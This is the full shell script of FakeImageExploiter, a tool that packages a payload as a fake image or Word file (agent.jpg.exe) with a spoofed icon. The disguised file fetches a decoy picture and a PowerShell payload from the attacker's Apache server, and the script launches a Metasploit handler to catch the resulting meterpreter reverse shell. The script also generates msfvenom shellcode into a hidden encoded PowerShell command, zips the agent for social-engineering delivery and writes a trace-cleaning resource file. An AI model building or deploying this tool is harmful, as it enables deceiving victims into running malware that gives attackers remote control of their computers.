FakeImageExploiter.sh

#!/bin/sh

##
# FakeImageExploiter v1.4 - agent.jpg.exe
# Version: v1.4 (Stable)
# CodeName: Metamorphosis
# Author: pedro ubuntu [ r00t-3xp10it ]
# Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS
# Suspicious-Shell-Activity (SSA) RedTeam develop @2017
#
# Description:
#   This module takes one existing image.jpg and one payload.ps1 (input by user) and
#   builds a new payload (agent.jpg.exe) that if executed it will trigger the download
#   of the 2 previous files stored into apache2 webserver (image.jpg + payload.ps1).
#   This module also changes the payload Icon to match the input image.jpg Then uses
#   'hides known file extensions' to hidde the .exe extension (final: agent.jpg.exe) ..
#
# Exploitation:
#   agent.jpg.exe final binary should be deliver to target using social enginnering
#   (apache2) As soon as the victim runs our executable, our picture will be downloaded
#   and opened in the default picture viewer, our malicious payload will be executed,
#   and we will get a meterpreter session.
#
# 'This tool also builds a cleaner.rc file to delete payloads left in target'
# Credits: https://null-byte.wonderhowto.com/how-to/hide-virus-inside-fake-picture-0168183
##
# resize terminal window [ milton@barra ] ..
resize -s 22 92 > /dev/null



#
# Colorise shell Script output leters
#
Colors() {
Escape="\033";
  white="${Escape}[0m";
  RedF="${Escape}[31m";
  GreenF="${Escape}[32m";
  YellowF="${Escape}[33m";
  BlueF="${Escape}[34m";
  CyanF="${Escape}[36m";
Reset="${Escape}[0m";
}



#
# Framework variable declarations
#
VeR="1.3" # Framework version
ArCh=`arch` # store attackers system arch
IPATH=`pwd` # store Framework full path
HoME=`echo ~` # store home variable
CnA="Metamorphosis" # Framework codename display
DiStR0=`awk '{print $1}' /etc/issue` # grab distribution (Ubuntu | Kali | parrot)
InT3R=`netstat -r | grep "default" | awk {'print $8'}` # grab interface in use (wlan0 | eth0)
HkLm=`cat $HoME/.wine/system.reg | egrep -m 1 'ProductName' | cut -d '=' -f2 | cut -d '"' -f2` > /dev/null 2>&1 # wine windows version
#
# Read options (configurations) from settings file ..
#
bYR=`cat $IPATH/settings | egrep -m 1 "BYPASS_RH" | cut -d '=' -f2` > /dev/null 2>&1 # bypass resource hacker funtion?
EtU=`cat $IPATH/settings | egrep -m 1 "PICTURE_EXTENSION" | cut -d '=' -f2` > /dev/null 2>&1 # store extension to use
PaLe=`cat $IPATH/settings | egrep -m 1 "PAYLOAD_EXTENSION" | cut -d '=' -f2` > /dev/null 2>&1 # store extension to use
ApAc=`cat $IPATH/settings | egrep -m 1 "APACHE_WEBROOT" | cut -d '=' -f2` > /dev/null 2>&1 # store apache2 webroot
NoMsF=`cat $IPATH/settings | egrep -m 1 "NON_MSF_PAYLOADS" | cut -d '=' -f2` > /dev/null 2>&1 # stored from settings file
AuTo=`cat $IPATH/settings | egrep -m 1 "AUTO_PAYLOAD_BUILD" | cut -d '=' -f2` > /dev/null 2>&1 # stored from settings file
AhPu=`cat $IPATH/settings | egrep -m 1 "AGENT_HANDLER_PORT" | cut -d '=' -f2` > /dev/null 2>&1 # Agent/handler port
FwDc=`cat $IPATH/settings | egrep -m 1 "FAKE_WORD_DOC" | cut -d '=' -f2` > /dev/null 2>&1 # fake word doc builder
PuIa=`cat $IPATH/settings | egrep -m 1 "USE_PUBLIC_IP" | cut -d '=' -f2` > /dev/null 2>&1 # Use public ip addr?
PuiB=`cat $IPATH/settings | egrep -m 1 "EXTERNAL_IP" | cut -d '=' -f2` > /dev/null 2>&1 # Use public ip addr?
ChEk=`cat $IPATH/settings | egrep -m 1 "MSF_REBUILD" | cut -d '=' -f2` > /dev/null 2>&1 # rebuild metasploit db?


#
# Config user system correct arch
#
if [ "$ArCh" = "i386" ] || [ "$ArCh" = "i686" ]; then
  dEd="x86"
  arch="wine"
  PgFi="Program Files"
  ComP="i586-mingw32msvc-gcc"
elif [ "$ArCh" = "x86_64" ] || [ "ArCh" = "amd64" ]; then
  dEd="x64"
  arch="wine64"
  PgFi="Program Files (x86)" # default value
  ComP="i686-w64-mingw32-gcc"
else
  dEd="x86"
  arch="wine"
  PgFi="Program Files"
  ComP="i586-mingw32msvc-gcc"
fi
#
# Resource hacker install path (local)
#
RhI="$HoME/.wine/drive_c/$PgFi/Resource Hacker/ResourceHacker.exe"



#
# Grab Ip address to config apache2 URL and evil agent download URL
#
case $DiStR0 in
    Kali) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`;;
    Debian) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`;;
    Mint) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}' | cut -d ':' -f2`;;
    Ubuntu) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | awk {'print $1'}`;;
    Parrot) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
    BackBox) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
    elementary) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
    *) IP=`zenity --title="☠ Input your IP addr ☠" --text "example: 192.168.1.68" --entry --width 300`;;
  esac
clear



#
# Use your public ip addr to deliver payloads over wan ..
#
if [ "$PuIa" = "YES" ]; then
IP="$PuiB"
fi



#
# Check for dependencies Installed ..
# xterm, zenity, apache2, mingw32[64], ResourceHacker(wine)
#
Colors;
echo ${BlueF}[☆]${white} Checking backend applications ..${Reset};
sleep 1
#
# search for mingw32[64] intallation ..
# i586-mingw32msvc-gcc OR i686-w64-mingw32-gcc
# 
apc=`which $ComP`
if [ "$?" != "0" ]; then
  FaIl="YES"
  echo ${RedF}[x]${white} mingw32[64] installation '->' not found!${Reset};
  sleep 1
  echo ${RedF}[x]${white} This script requires mingw32[64] to work${Reset};
  echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
    #
    # Installing the correct arch GCC compiller
    #
    if [ "$dEd" = "x86" ]; then
      echo ""
      sudo apt-get install mingw32
      echo ""
    else
      echo ""
      sudo dpkg --add-architecture i386 && apt-get update && apt-get -y dist-upgrade --allow-downgrades && apt-get install -y mingw32 i586-mingw32msvc-gcc mingw-w64 i686-w64-mingw32-gcc
      echo ""
    fi
else
  echo ${BlueF}[☆]${white}" mingw32 installation : ${GreenF}found!"${Reset};
  sleep 1
fi

# search for wine intallation ..
apc=`which wine`
if [ "$?" != "0" ]; then
  FaIl="YES"
  echo ${RedF}[x]${white} Wine installation '->' not found!${Reset};
  sleep 1
  echo ${RedF}[x]${white} This script requires wine to work${Reset};
  echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
  echo ""
  sudo apt-get install wine
  echo ""
else
  echo ${BlueF}[☆]${white}" Wine installation    : ${GreenF}found!"${Reset};
  sleep 1
fi

# search for xterm intallation ..
apc=`which xterm`
if [ "$?" != "0" ]; then
  FaIl="YES"
  echo ${RedF}[x]${white} Xterm installation '->' not found!${Reset};
  sleep 1
  echo ${RedF}[x]${white} This script requires xterm to work!${Reset};
  echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
  echo ""
  sudo apt-get install xterm
  echo ""
else
  echo ${BlueF}[☆]${white}" Xterm installation   : ${GreenF}found!"${Reset};
  sleep 1
fi

# search for zenity intallation ..
apc=`which zenity`
if [ "$?" != "0" ]; then
  FaIl="YES"
  echo ${RedF}[x]${white} Zenity installation '->' not found!${Reset};
  sleep 1
  echo ${RedF}[x]${white} This script requires Zenity to work!${Reset};
  echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
  echo ""
  sudo apt-get install zenity
  echo ""
else
  echo ${BlueF}[☆]${white}" Zenity installation  : ${GreenF}found!"${Reset};
  sleep 1
fi

# search for: '.wine/drive_c/Program Files' folder ..
if [ -e "$HoME/.wine/drive_c/$PgFi" ]; then
  echo ${BlueF}[☆]${white}" Wine $PgFi   : ${GreenF}found!"${Reset};
  sleep 1
else
  FaIl="YES"
  echo ${RedF}[x]${white} Wine: $PgFi '->' not found!${Reset};
  sleep 2
  echo ${GreenF}[☆]${white} Please wait, trying to build required folders ..!${Reset};
  winecfg > /dev/null 2>&1
  echo ""
  echo ${RedF}Listing drive_c directorys: ${Reset};
  ls $HoME/.wine/drive_c
  echo ""
fi



#
# Restart tool after dependencies installs (FaIl="YES")
#
if [ "$FaIl" = "YES" ]; then
  sleep 3
  echo ${YellowF}[☆] FakeImageExploiter needs to restart to finish installs ..${Reset};
  sleep 2
  exit
fi



#
# Config WINE windows version (if not supported) ..
#
if ! [ "$HkLm" = "Microsoft Windows 7" ]; then
  echo ${RedF}[x]${white} Wine system detected : ${RedF}$HkLm ${Reset};
  echo ${RedF}[x]${white} FakeImageExploiter requires: ${GreenF}windows 7${white} version ..${Reset};
  echo ${YellowF}[☆] Starting winecfg, Please sellect required version ..${Reset};
  sleep 1
  winecfg > /dev/null 2>&1
fi



#
# 1º BANNER DISPLAY (run or abort)
# HINT: This will give users the chance to abort tool
# execution, edit 'settings' file to use a diferent extension ..
#
clear
cat << !

    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+---+
    |F|a|k|e|I|m|a|g|e|E|x|p|l|o|i|t|e|r|:|$VeR|
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-----+

    Extension sellected: .$EtU (picture)
    Extension sellected: .$PaLe (payload)
   'Config settings file to use other extensions'

!
#
# Chose to run or to abort framework execution ..
# IF decided to run, start requiered services ..
#
rUn=$(zenity --question --title="☠ FakeImageExploiter ☠" --text "Execute framework?" --width 270) > /dev/null 2>&1
#
# check if settings file its proper configurated
#
if [ "$PaLe" = "exe" ] && [ "$AuTo" = "YES" ]; then
  echo ${RedF}[x]${YellowF} "[settings] AUTO_PAYLOAD_BUILD=${RedF}$AuTo${YellowF} and PAYLOAD_EXTENSION=${RedF}$PaLe"${Reset};
  sleep 2
  echo ${RedF}[x]${YellowF} "Can ${RedF}NOT${YellowF} be used simultaneously, AUTO_PAYLOAD_BUILD does not build .exe binarys."${Reset};
  exit
fi

  if [ "$?" -eq "0" ]; then
    service apache2 start | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Start apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
    # read NON-METASPLOIT payloads conf in 'settings' file ..
    if ! [ "$NoMsF" = "YES" ]; then
    service postgresql start | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Start Metasploit services" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
      #
      # rebuild msfdb ? (check settings file)
      # 
      if [ "$ChEk" = "ON" ]; then
        #
        # start msfconsole to check postgresql connection status
        #
        service postgresql start
        echo ${BlueF}[☆]${white}" Checking msfdb connection status .."${Reset};
        ih=`msfconsole -q -x 'db_status; exit -y' | awk {'print $3'}`
          if [ "$ih" != "connected" ]; then
            echo ${RedF}[x]${white}" postgresql selected, no connection .."${Reset};
            echo ${BlueF}[☆]${white}" Please wait, rebuilding msf database .."${Reset};
            # rebuild msf database (database.yml)
            msfdb reinit | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Rebuild metasploit database" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
            echo ${GreenF}[✔]${white}" postgresql connected to msf .."${Reset};
            sleep 2
          else
            echo ${GreenF}[✔]${white}" postgresql connected to msf .."${Reset};
            sleep 2
          fi
      fi
    fi

  else

    clear
    echo ""
    # Abort tool execution, lets chose another extension to use ..
    echo ${white}    Codename${RedF}::${white}$CnA ${Reset};
    echo ${white}    Author${RedF}::${white}pedr0 ubuntu${RedF}::${white}[r00t-3xp10it]${Reset};
    echo ${white}    FakeImageExploiter${RedF}::${white}v$VeR${RedF}::${white}SuspiciousShellActivity©${RedF}::${white}RedTeam${RedF}::${white}2017${Reset};
    echo ""
    # Stoping all services ..
    service apache2 stop | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
    if ! [ "$NoMsF" = "YES" ]; then
    service postgresql stop | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
    fi
    exit
  fi


#
# START OF THE 'REAL' FUNTIONS, Questions to user (zenity)
#
if [ "$AuTo" = "YES" ]; then
  #
  # AUTO_PAYLOAD_BUILD=YES (settings file conf) ..
  # WARNING: This funtion only works if active in settings file ..
  #
  paylo=$(zenity --list --title "☠ AUTO-BUILD PAYLOAD ☠" --text "\nChose payload to build:" --radiolist --column "Pick" --column "Option" TRUE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/x64/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_https" --width 350 --height 300) > /dev/null 2>&1
  xterm -T " FakeImageExploiter - build payload: .$PaLe " -geometry 110x23 -e "sudo msfvenom -p $paylo LHOST=$IP LPORT=$AhPu -f psh-cmd -o $IPATH/output/chars.raw" > /dev/null 2>&1
  # Inject shellcode into payload.ps1
  cd $IPATH/output
  str0=`cat chars.raw | awk {'print $12'}`
  echo "pOwErShElL -noP -wIN 1 -nOnI -eN Sh33L" > payload.raw
  sed "s|Sh33L|$str0|" payload.raw > payload.$PaLe
  # Delete old conf files ..
  rm payload.raw > /dev/null 2>&1
  rm chars.raw > /dev/null 2>&1
  cd $IPATH
else
# Orginal payload full-path variable
UpL=$(zenity --title "☠ PAYLOAD TO BE TRANSFORMED (only .$PaLe) ☠" --filename=$IPATH --file-selection --text "chose payload to be transformed") > /dev/null 2>&1
fi
sleep 1
# Orginal image.jpg full-path variable
JpG=$(zenity --title "☠ IMAGE TO BE USED (only .$EtU) ☠" --filename=$IPATH --file-selection --text "chose image to use.") > /dev/null 2>&1
sleep 1

#
# IF: FAKE_WORD_DOC=YES
# 
if [ "$FwDc" = "YES" ]; then
PaTh="$IPATH/icons/Microsoft-Word.ico"
else
  #
  # Icon to use in agent.jpg.exe (RH auto-replacement)
  # HINT: zenity displays will be based on picture inputed extension ..
  #
  if [ "$EtU" = "jpg" ]; then
  IcOn=$(zenity --list --title "☠ ICON REPLACEMENT  ☠" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPG-black.ico" FALSE "JPG-white.ico" FALSE "JPG-green.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
  elif [ "$EtU" = "jpeg" ]; then
  IcOn=$(zenity --list --title "☠ ICON REPLACEMENT  ☠" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPEG-black.ico" FALSE "JPEG-white.ico" FALSE "JPEG-orange.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
  elif [ "$EtU" = "png" ]; then
  IcOn=$(zenity --list --title "☠ ICON REPLACEMENT  ☠" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "PNG-black.ico" FALSE "PNG-white.ico" FALSE "PNG-simple.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
  else
  # I dont recognise the extension (picture) input by user ..
  IcOn=$(zenity --list --title "☠ ICON REPLACEMENT  ☠" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPG-Ios7.ico" FALSE "Microsoft-Word.ico" FALSE "Microsoft-Excel.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
  fi
  #
  # User have decided to input is own icon.ico file ..
  # So, were is it ? (your icon.ico full path?) ..
  #
  if [ "$IcOn" = "Input your own icon" ]; then
    ImR=$(zenity --title "☠ ICON REPLACEMENT ☠" --filename=$IPATH --file-selection --text "chose icon.ico to use") > /dev/null 2>&1
    PaTh="$ImR"
  else
    PaTh="$IPATH/icons/$IcOn"
  fi
fi
sleep 1
# Rename your agent (name.jpg.exe) ..
MiP=$(zenity --title "☠ PAYLOAD FINAL NAME ☠" --text "example: screenshot" --entry --width 300) > /dev/null 2>&1
clear
cat << !

    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+---+
    |F|a|k|e|I|m|a|g|e|E|x|p|l|o|i|t|e|r|:|$VeR|
    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-----+

!
#
# Build/config evil agent C binary
# HINT: In reallity we are just using SED to config it ..
#
cd $IPATH/bin
echo ${BlueF}[☆]${white} Building : evil agent ..${Reset};
  #
  # If binary extension = exe then compile evil2.C [mascerano fix]
  #
  if [ "$PaLe" = "exe" ]; then
    sed "s|LhOsT|$IP|g" evil2.c > evilcopy.c
    sed -i "s|ScRee|$MiP.$EtU|g" evilcopy.c
    sed -i "s|EhLh|$PaLe|g" evilcopy.c
    sleep 2
  else
    sed "s|LhOsT|$IP|g" evil.c > evilcopy.c
    sed -i "s|ScRee|$MiP.$EtU|g" evilcopy.c
    sed -i "s|EhLh|$PaLe|g" evilcopy.c
    sleep 2
  fi



#
# Compiling agent using mingw32[64] (gcc)
# WARNING: this funtion only compiles 32bites payloads
# GCC    : i586-mingw32msvc-gcc OR i686-w64-mingw32-gcc
#
echo ${BlueF}[☆]${white} Compiling: agent using mingw32 ..${Reset};
sleep 2
$ComP evilcopy.c -o trigger.exe -lws2_32 -mwindows
mv trigger.exe $IPATH/output/trigger.exe > /dev/null 2>&1
cd $IPATH



#
# Run or abort ResourceHacker usage (BYPASS_RH=YES)
# This funtion allow you to use another editor to change icons ..
#
if [ "$bYR" = "YES" ]; then
  echo ${YellowF}[☆]${white} Manually change icon.ico sellected ..${Reset};
  echo ${YellowF}[☆]${white} Use your favorite editor to change icon [trigger.exe]${Reset};
  echo ${YellowF}[☠] When finish, press any key to Continue ..${Reset};
  # Waiting for you to finish (read op) ..
  read op
  # Now, port the metamorphosis agent to output folder ..
  mv $IPATH/output/trigger.exe $IPATH/output/agent.exe > /dev/null 2>&1

else

  #
  # Check for resource hacker installation (wine)
  # Iam paranoic you know? i like to check twice just in case :D
  #
  if [ -f "$RhI" ]; then
    echo ${BlueF}[☆]${white} ResourceHacker.exe: found ..${Reset};
    sleep 1
    #
    # Wine command to call resourcehacker and add an icon.ico to the 'agent.exe'
    #
    echo ${BlueF}[☆]${white} Working: In backdoor agent ..${Reset};
    $arch "$RhI" -open "$IPATH/output/trigger.exe" -save "$IPATH/output/agent.exe" -action addskip -res "$PaTh" -mask ICONGROUP,MAINICON,
    echo ${BlueF}[☆]${white} Change : backdoor agent icons ..${Reset};
    sleep 1

  else

    #
    # Resource-Hacker Installation under WINE (the problem beggings) ..
    # Lets hope everything its proper config before running this funtion ..
    # OR this funtion will enter into a loop, unless (BYPASS_RH=YES) its active in settings file.
    #
    echo ${RedF}[x]${white} ResourceHacker.exe '->' not found!${Reset};
    sleep 1
cat << !

    Installing ResourceHacker under .wine directorys ..
    Version:$HkLm Arch:$ArCh Folder:$PgFi
    PATH:$RhI

!
    sleep 3
    # Installing Resource-Hacker.exe under wine ..
    xterm -T "FakeImageExploiter" -geometry 90x26 -e "$arch $IPATH/bin/reshacker_setup.exe && sleep 3"
    echo ${YellowF}[☆] Please wait, restarting tool ..${Reset};
    echo ${YellowF}[☆] For proper ResourceHacker.exe Instalation!${Reset};
    sleep 2
    exit

  fi
fi



  #
  # Change agent extension (spoof extension)
  # TODO: Downside of RTLO, only last six caracters will be spoofed [no jpeg]
  #
  echo ${BlueF}[☆]${white} Change : backdoor agent extension ..${Reset};
  mv $IPATH/output/agent.exe  $IPATH/output/$MiP.$EtU.exe > /dev/null 2>&1
  sleep 2


    #
    # Port to apache2 all files (zip agent.jpg.exe)
    #
    echo ${BlueF}[☆]${white} Port: all files to apache2 webserver ..${Reset};
      #
      # IF: AUTO_PAYLOAD_BUILD=YES
      # Then port FakeImageExploiter build (payload.ps1) to apache2 ..
      #
      if [ "$AuTo" = "YES" ]; then
        cp $IPATH/output/payload.$PaLe $ApAc/payload.$PaLe > /dev/null 2>&1
      else      
        cp $UpL $ApAc/payload.$PaLe > /dev/null 2>&1
      fi

    cp $JpG $ApAc/$MiP.$EtU > /dev/null 2>&1
    sleep 2
    echo ${BlueF}[☆]${white} Creating: archive $MiP.zip ..${Reset};
    cd $IPATH/output
    # IF: FAKE_WORD_DOC=YES
    if [ "$FwDc" = "YES" ]; then
      # Zip it (to apache2 webserver delivery) ..
      mv $MiP.$EtU.exe $MiP.docx.exe > /dev/null 2>&1
      zip $MiP.zip $MiP.docx.exe > /dev/null 2>&1
      mv $MiP.zip $ApAc/$MiP.zip > /dev/null 2>&1
    else
      # Zip it (to apache2 webserver delivery) ..
      zip $MiP.zip $MiP.$EtU.exe > /dev/null 2>&1
      mv $MiP.zip $ApAc/$MiP.zip > /dev/null 2>&1
    fi
    cd $IPATH
    sleep 2


    #
    # Use your own binary (NON_MSF_PAYLOADS=YES)
    # WARNING: You need to start your own handler to recibe the connection ..
    # WARNING: If this funtion is active, then we will not build the cleaner.rc ..
    # WARNING: This funtion will NOT work together with (AUTO_PAYLOAD_BUILD=YES) ..
    #
    if [ "$NoMsF" = "YES" ]; then
      echo ${BlueF}[☠]${white} Metamorphosis: completed ..${Reset};
      sleep 2
      echo ${YellowF}[☠] Start your own handler now '(listener)' ..${Reset};
      sleep 2
      # Clean stuff (old config files)
      rm $IPATH/bin/evilcopy.c > /dev/null 2>&1
      rm $IPATH/output/trigger.exe > /dev/null 2>&1
      # Attack vector (apache2 webserver)
      echo ""
      echo ${RedF}"    ATTACK VECTOR: http://$IP/$MiP.zip"${Reset};
      echo ${RedF}"    AGENT: $IPATH/output/$MiP.$EtU.exe"${Reset};
      echo ""
      sleep 1
      echo ${YellowF}[☠] When finish, press any key to Exit FakeImageExploiter ..${Reset};
      # Waiting for you to finish (read op) ..
      read op

    else

      #
      # Build cleanner resource file (cleaner.rc)
      # WARNING: This RC file must be called manually from meterpreter prompt
      #
      echo ${BlueF}[☆]${white} Creating: resource cleaner.rc ..${Reset};
      sleep 2
      cd $IPATH/bin
      #
      # If binary extension = exe then use cleaner2.rc
      # This cleaner.rc will delete payload.ps1 and picture.jpg ..
      #
      if [ "$PaLe" = "exe" ]; then
        sed "s|RffR|$PaLe|g" cleaner2.rc > copy.rc
        sed -i "s|FaaF|$MiP|g" copy.rc
        sed -i "s|AssA|$EtU|g" copy.rc
        mv copy.rc $IPATH/output/cleaner.rc > /dev/null 2>&1
        cd $IPATH
      else
        #
        # This cleaner.rc only deletes picture.jpg from target ..
        # Because all non-exe payloads will be executed in target RAM (dont touch disk).
        #
        sed "s|FaaF|$MiP|g" cleaner.rc > copy.rc
        sed -i "s|AssA|$EtU|g" copy.rc
        mv copy.rc $IPATH/output/cleaner.rc > /dev/null 2>&1
        cd $IPATH
      fi


        #
        # Start metasploit multi-handler ..
        # WARNING: agent.jpg.exe will be ziped (zip) for apache2 use, because
        # it raises less suspicious to use an URL http://IP/image.zip that
        # use URL http://IP/image.jpg.exe to deliver payload using apache2
        #
        echo ${BlueF}[☠]${white} Metamorphosis: completed ..${Reset};
        rm $IPATH/output/trigger.exe > /dev/null 2>&1
        sleep 2
          #
          # IF: AUTO_PAYLOAD_BUILD=YES
          # Then auto-config the handler [Metasploit] ..
          #
          if [ "$AuTo" = "YES" ]; then
            lhost="$IP"
            lport="$AhPu"
          else
            #
            # Manually input handler settings [metasploit]
            #
            lhost=$(zenity --title="☠ Enter binary.exe LHOST ☠" --text "example: $IP" --entry --width 300) > /dev/null 2>&1
            lport=$(zenity --title="☠ Enter binary.exe LPORT ☠" --text "example: $AhPu" --entry --width 300) > /dev/null 2>&1
            # input the payload used (of your uploaded binary)
            paylo=$(zenity --list --title "☠ FakeImageExploiter ☠" --text "\nChose payload used by binary.exe:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/x64/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_https" --width 350 --height 350) > /dev/null 2>&1
          fi
          #
          # Attack vector (apache2 webserver)
          # HINT: with cleaner.rc resource file display ..
          #
          echo ""
          echo ${RedF}"    ATTACK VECTOR: http://$IP/$MiP.zip"${Reset};
            if [ "$FwDc" = "YES" ]; then
              echo ${RedF}"    AGENT: $IPATH/output/$MiP.docx.exe"${Reset};
            else
              echo ${RedF}"    AGENT: $IPATH/output/$MiP.$EtU.exe"${Reset};
            fi
          echo ${RedF}"    CLEAN: meterpreter > resource $IPATH/output/cleaner.rc"${Reset};
          sleep 1
          # Start metasploit multi-handler ..
          xterm -T " PAYLOAD MULTI-HANDLER " -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $lhost; set LPORT $lport; set PAYLOAD $paylo; exploit'"
    fi


      #
      # Clean all things up ..
      #
      rm $ApAc/$MiP.$EtU > /dev/null 2>&1
      rm $ApAc/$MiP.zip > /dev/null 2>&1
      rm $ApAc/payload.$PaLe > /dev/null 2>&1
      rm $ApAc/$MiP.$EtU.exe > /dev/null 2>&1
      rm $IPATH/bin/evilcopy.c > /dev/null 2>&1
      rm $IPATH/output/trigger.exe > /dev/null 2>&1
      sleep 2

    #
    # Exit framework ..
    #
    echo ""
    echo ${white}    Codename${RedF}::${white}$CnA ${Reset};
    echo ${white}    Author${RedF}::${white}pedr0 ubuntu${RedF}::${white}[r00t-3xp10it]${Reset};
    echo ${white}    FakeImageExploiter${RedF}::${white}v$VeR${RedF}::${white}SuspiciousShellActivity©${RedF}::${white}RedTeam${RedF}::${white}2017${Reset};
    sleep 1
    # Stop services, And good nigth ..
    service apache2 stop | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
    if ! [ "$NoMsF" = "YES" ]; then
    service postgresql stop | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
    fi
exit